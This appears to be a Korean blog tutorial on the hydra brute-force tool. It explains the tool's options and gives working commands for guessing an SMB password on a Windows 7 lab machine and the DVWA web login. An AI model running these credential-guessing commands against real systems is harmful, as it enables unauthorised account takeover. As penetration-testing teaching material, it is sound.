hydra는 패스워드를 무작위로 대입하는 툴로서 가능한 경우의 수를 모두 대입한다.
명령어 옵션은 아래와 같다.
-t : 쓰레드 개수를 지정하여 병렬적으로 작업한다.
최대 64개까지 지정할 수 있으며 많이 줄수록 작업 속도가 빨라진다.
-V : 시도하는 계정과 비밀번호를 화면에 보여준다.
-f : 로그인 성공 시 작업을 종료한다.
-x : 사전 파일없이 자체적으로 비밀번호를 생성한다.
형식 : min:max:charset
3:3:a = 3글자 소문자 비밀번호를 생성한다
4:6:1aA% = 4~6글자 숫자,소문자,대문자,%를 생성한다.
-p : 사전에 만들어둔 패스워드 파일을 이용하여 작업한다.
※ 윈도우 smb
- 윈7(192.168.111.129)
smb 보안패치 완료된 os에서는 안먹힌다.
# nmap -sV 192.168.111.129
- smb 445 포트 open 상태
# hydra -l ojk -x 3:3:1a 192.168.111.129 smb -V -f -t 64
호스트 아이디는 ojk라는 것을 알고있을 때 해당 아이디로 패스워드를 3글자,숫자,소문자 섞어서 무작위 대입한다.
-f 옵션을 사용하면 로그인 성공 시 작업을 마무리한다.
※ 사이트 로그인 계정
- DVWA
admin 계정의 비밀번호를 알아내려고 한다.
로그인이 실패했는지 판단하기 위해 로그인 시도 응답값을 확인한다.
# hydra -l admin -P pw.txt 192.168.0.198 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
'해킹-보안' 카테고리의 다른 글
| 파일 업로드 취약점 Challenge (0) | 2020.07.25 |
|---|---|
| sqlmap 사용법 (0) | 2020.07.20 |
| 파일 업로드/다운로드 취약점 공격 (0) | 2020.07.05 |
| 버프스위트(Burpsuite) 설치 및 환경설정 (0) | 2020.07.05 |
| BeEF Framework를 이용한 웹 브라우저 후킹 (0) | 2020.07.04 |
